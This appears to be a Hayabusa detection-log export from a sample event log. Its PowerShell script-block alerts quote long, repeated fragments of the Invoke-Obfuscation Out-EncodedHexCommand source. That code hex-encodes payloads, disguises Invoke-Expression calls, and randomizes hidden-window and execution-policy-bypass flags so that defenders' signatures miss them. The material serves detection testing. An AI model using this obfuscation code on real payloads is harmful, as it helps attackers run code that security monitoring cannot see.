$BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . 
* ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
